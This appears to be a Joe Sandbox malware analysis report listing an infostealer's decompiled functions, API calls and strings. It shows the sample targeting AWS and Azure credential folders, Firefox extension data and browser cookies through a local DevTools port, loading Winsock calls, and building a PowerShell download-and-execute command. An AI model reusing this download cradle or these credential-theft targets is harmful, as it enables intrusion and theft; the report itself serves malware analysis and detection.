                            • lstrcpy.KERNEL32(00000000,?), ref: 006EE85F
                            • lstrcat.KERNEL32(?,00000000), ref: 006EE86D
                            • lstrcat.KERNEL32(?,\.aws\), ref: 006EE886
                            • memset.MSVCRT ref: 006EE8C5
                            • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 006EE8F1
                            • lstrcpy.KERNEL32(00000000,?), ref: 006EE920
                            • lstrcat.KERNEL32(?,00000000), ref: 006EE92E
                            • lstrcat.KERNEL32(?,\.IdentityService\), ref: 006EE947
                            • memset.MSVCRT ref: 006EE986
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$memset$FolderPathlstrcpy
                            • String ID: *.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                            • API String ID: 4067350539-3645552435
                            • Opcode ID: 3d1c716c505dc0ca144a794ded24cf6dd70422193fc574e59b8c2c69c69093df
                            • Instruction ID: d4dea34db75709eaa8599f8f3d6f36cb13c276d86e21a96a10b78cc8c91e0294
                            • Opcode Fuzzy Hash: 3d1c716c505dc0ca144a794ded24cf6dd70422193fc574e59b8c2c69c69093df
                            • Instruction Fuzzy Hash: D8712AB1E50229AFDB61EB64DC46FED7375EF58300F040499B7199B2C1DEB0AE448B58
                            Function 006EABB2 Relevance: 39.3, APIs: 25, Strings: 1, Instructions: 297stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32 ref: 006EABCF
                            • lstrlen.KERNEL32(0101F2C8), ref: 006EABE5
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006EAC0D
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006EAC18
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006EAC41
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006EAC84
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006EAC8E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006EACB7
                            • lstrlen.KERNEL32(00704AD4), ref: 006EACD1
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006EACF3
                            • lstrcat.KERNEL32(00000000,00704AD4), ref: 006EACFF
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006EAD28
                            • lstrlen.KERNEL32(00704AD4), ref: 006EAD3A
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006EAD5C
                            • lstrcat.KERNEL32(00000000,00704AD4), ref: 006EAD68
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006EAD91
                            • lstrlen.KERNEL32(0101F118), ref: 006EADA7
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006EADCF
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006EADDA
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006EAE03
                            • lstrcpy.KERNEL32(00000000,?), ref: 006EAE3F
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006EAE49
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006EAE6F
                            • lstrlen.KERNEL32(00000000), ref: 006EAE85
                            • lstrcpy.KERNEL32(00000000,0101F130), ref: 006EAEB8
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$lstrlen
                            • String ID: f
                            • API String ID: 2762123234-1993550816
                            • Opcode ID: 42701d64c2498f63e4ce7ff56f4f5500dc8ed560374f93b79b86043580338e43
                            • Instruction ID: 5df742400a745c4e506bebe1b8cd6c34389e897f29fb22344ddd4882be2965f5
                            • Opcode Fuzzy Hash: 42701d64c2498f63e4ce7ff56f4f5500dc8ed560374f93b79b86043580338e43
                            • Instruction Fuzzy Hash: 5CB16E70A266279FCB61EBA6CC586AFB7BBEF10300F044529B40597361DB34ED01DB95
                            Function 006F47E0 Relevance: 38.5, APIs: 11, Strings: 11, Instructions: 48libraryloaderCOMMON
                            Download Yara Rule
                            APIs
                            • LoadLibraryA.KERNEL32(ws2_32.dll,?,006E72A4), ref: 006F47E6
                            • GetProcAddress.KERNEL32(00000000,connect), ref: 006F47FC
                            • GetProcAddress.KERNEL32(00000000,WSAStartup), ref: 006F480D
                            • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 006F481E
                            • GetProcAddress.KERNEL32(00000000,htons), ref: 006F482F
                            • GetProcAddress.KERNEL32(00000000,WSACleanup), ref: 006F4840
                            • GetProcAddress.KERNEL32(00000000,recv), ref: 006F4851
                            • GetProcAddress.KERNEL32(00000000,socket), ref: 006F4862
                            • GetProcAddress.KERNEL32(00000000,freeaddrinfo), ref: 006F4873
                            • GetProcAddress.KERNEL32(00000000,closesocket), ref: 006F4884
                            • GetProcAddress.KERNEL32(00000000,send), ref: 006F4895
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$LibraryLoad
                            • String ID: WSACleanup$WSAStartup$closesocket$connect$freeaddrinfo$getaddrinfo$htons$recv$send$socket$ws2_32.dll
                            • API String ID: 2238633743-3087812094
                            • Opcode ID: a11e050666896b86e13b6641bed35afc4609dfb5bed31689528067a0776709d0
                            • Instruction ID: b7839daec5544cf72eca06b74b9b3e26355d479806339fde86737d8c5f4b591e
                            • Opcode Fuzzy Hash: a11e050666896b86e13b6641bed35afc4609dfb5bed31689528067a0776709d0
                            • Instruction Fuzzy Hash: B5116AB1A79714EFC710AFB4EC0DA573AB8BB0A709304091AF591D21A1DAF84440FF50
                            Function 006EBE20 Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 203stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006EBE53
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006EBE86
                            • lstrlen.KERNEL32(-nop -c "iex(New-Object Net.WebClient).DownloadString('), ref: 006EBE91
                            • lstrcpy.KERNEL32(00000000,?), ref: 006EBEB1
                            • lstrcat.KERNEL32(00000000,-nop -c "iex(New-Object Net.WebClient).DownloadString('), ref: 006EBEBD
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006EBEE0
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006EBEEB
                            • lstrlen.KERNEL32(')"), ref: 006EBEF6
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006EBF13
                            • lstrcat.KERNEL32(00000000,')"), ref: 006EBF1F
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006EBF46
                            • lstrlen.KERNEL32(C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe), ref: 006EBF66
                            • lstrcpy.KERNEL32(00000000,?), ref: 006EBF88
                            • lstrcat.KERNEL32(00000000,C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe), ref: 006EBF94
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006EBFBA
                            • ShellExecuteEx.SHELL32(?), ref: 006EC00C
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$lstrlen$ExecuteShell
                            • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            • API String ID: 4016326548-898575020
                            • Opcode ID: a359c57ee4b298ab8e14e492d7ce81fb51d3de34c866de36617cb76b7c41b8e7
                            • Instruction ID: 05034916890a63062ad43d24bbcc7eefb3bf9574c5f398d16390a9af9e7c9a1b
                            • Opcode Fuzzy Hash: a359c57ee4b298ab8e14e492d7ce81fb51d3de34c866de36617cb76b7c41b8e7
                            • Instruction Fuzzy Hash: 3A61D470E1639A9FCB61AFB69C596AF7BBAAF14300F046429F505D7352DB34C8018B94
                            Function 006F1820 Relevance: 31.5, APIs: 25, Instructions: 269stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006F184F
                            • lstrlen.KERNEL32(01006F30), ref: 006F1860
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006F1887
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006F1892
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006F18C1
                            • lstrlen.KERNEL32(00704FA0), ref: 006F18D3
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006F18F4
                            • lstrcat.KERNEL32(00000000,00704FA0), ref: 006F1900
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006F192F
                            • lstrlen.KERNEL32(01006F40), ref: 006F1945
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006F196C
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006F1977
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006F19A6
                            • lstrlen.KERNEL32(00704FA0), ref: 006F19B8
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006F19D9
                            • lstrcat.KERNEL32(00000000,00704FA0), ref: 006F19E5
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006F1A14
                            • lstrlen.KERNEL32(01007010), ref: 006F1A2A
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006F1A51
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006F1A5C
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006F1A8B
                            • lstrlen.KERNEL32(01006F50), ref: 006F1AA1
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006F1AC8
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006F1AD3
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006F1B02
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcatlstrlen
                            • String ID:
                            • API String ID: 1049500425-0
                            • Opcode ID: 2645389dc38b9aa7b800bbea976969f78afe3048a584271e4d0b55f6c623ac97
                            • Instruction ID: 26fd8777971613660e0bf9ce65ae42373de073b4f46ba8c4b8199f6d9f4d59ed
                            • Opcode Fuzzy Hash: 2645389dc38b9aa7b800bbea976969f78afe3048a584271e4d0b55f6c623ac97
                            • Instruction Fuzzy Hash: C4919EB0A1430BDFD7209FB6DC98A67B7EAEF15380B14542DA996CB351DB34E841CB50
                            Function 006E4760 Relevance: 30.3, APIs: 18, Strings: 2, Instructions: 309stringmemoryCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,?), ref: 006E4793
                            • LocalAlloc.KERNEL32(00000040,?), ref: 006E47C5
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006E4812
                            • lstrlen.KERNEL32(00704B60), ref: 006E481D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E483A
                            • lstrcat.KERNEL32(00000000,00704B60), ref: 006E4846
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E486B
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E4898
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006E48A3
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E48CA
                            • StrStrA.SHLWAPI(?,00000000), ref: 006E48DC
                            • lstrlen.KERNEL32(?), ref: 006E48F0
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006E4931
                            • lstrcpy.KERNEL32(00000000,?), ref: 006E49B8
                            • lstrcpy.KERNEL32(00000000,?), ref: 006E49E1
                            • lstrcpy.KERNEL32(00000000,?), ref: 006E4A0A
                            • lstrcpy.KERNEL32(00000000,?), ref: 006E4A30
                            • lstrcpy.KERNEL32(00000000,?), ref: 006E4A5D
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcatlstrlen$AllocLocal
                            • String ID: ^userContextId=4294967295$moz-extension+++
                            • API String ID: 4107348322-3310892237
                            • Opcode ID: f35bd6b10df15227fa83e5dc1b4388c3c42f8c4e43884f733e9c129cf733654d
                            • Instruction ID: eff4d3de05988ecc003fffc0748b82ecd155ce8dda72949a0c083404b38f46bf
                            • Opcode Fuzzy Hash: f35bd6b10df15227fa83e5dc1b4388c3c42f8c4e43884f733e9c129cf733654d
                            • Instruction Fuzzy Hash: 90B1A071A163569BCB71EF7AD899AAF77B6AF50300F044129F846A7351DF30EC018B94
                            Function 006D92B0 Relevance: 27.4, APIs: 13, Strings: 5, Instructions: 369stringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 006D90C0: InternetOpenA.WININET(006FCFEC,00000001,00000000,00000000,00000000), ref: 006D90DF
                              • Part of subcall function 006D90C0: InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 006D90FC
                              • Part of subcall function 006D90C0: InternetCloseHandle.WININET(00000000), ref: 006D9109
                            • strlen.MSVCRT ref: 006D92E1
                            • strlen.MSVCRT ref: 006D92FA
                              • Part of subcall function 006D8980: std::_Xinvalid_argument.LIBCPMT ref: 006D8996
                            • strlen.MSVCRT ref: 006D9399
                            • strlen.MSVCRT ref: 006D93E6
                            • lstrcat.KERNEL32(?,cookies), ref: 006D9547
                            • lstrcat.KERNEL32(?,00701794), ref: 006D9559
                            • lstrcat.KERNEL32(?,?), ref: 006D956A
                            • lstrcat.KERNEL32(?,00704B98), ref: 006D957C
                            • lstrcat.KERNEL32(?,?), ref: 006D958D
                            • lstrcat.KERNEL32(?,.txt), ref: 006D959F
                            • lstrlen.KERNEL32(?), ref: 006D95B6
                            • lstrlen.KERNEL32(?), ref: 006D95DB
                            • lstrcpy.KERNEL32(00000000,?), ref: 006D9614
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$strlen$Internet$Openlstrlen$CloseHandleXinvalid_argumentlstrcpystd::_
                            • String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
                            • API String ID: 1201316467-3542011879
                            • Opcode ID: 9c7d05258c920dce4bccfe92fd1519ebbd07eacc0751ee54c86e9016ba9e6b79
                            • Instruction ID: 42f8b209be02cba0d5b516d9699d712c1fbb2cadaf2896f80e066610a9cf270a
                            • Opcode Fuzzy Hash: 9c7d05258c920dce4bccfe92fd1519ebbd07eacc0751ee54c86e9016ba9e6b79
                            • Instruction Fuzzy Hash: CAE117B1E10219DFDF50DFA8D890ADEBBF6AF58300F1444AAE509A7341DB349A45CB94
                            Function 006ED980 Relevance: 27.3, APIs: 18, Instructions: 292stringCOMMON
                            Download Yara Rule
                            APIs
                            • memset.MSVCRT ref: 006ED9A1
                            • memset.MSVCRT ref: 006ED9B3
                            • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 006ED9DB
                            • lstrcpy.KERNEL32(00000000,?), ref: 006EDA0E
                            • lstrcat.KERNEL32(?,00000000), ref: 006EDA1C
                            • lstrcat.KERNEL32(?,0101F190), ref: 006EDA36
                            • lstrcat.KERNEL32(?,?), ref: 006EDA4A
                            • lstrcat.KERNEL32(?,0101DC48), ref: 006EDA5E
                            • lstrcpy.KERNEL32(00000000,?), ref: 006EDA8E
                            • GetFileAttributesA.KERNEL32(00000000), ref: 006EDA95
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006EDAFE
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
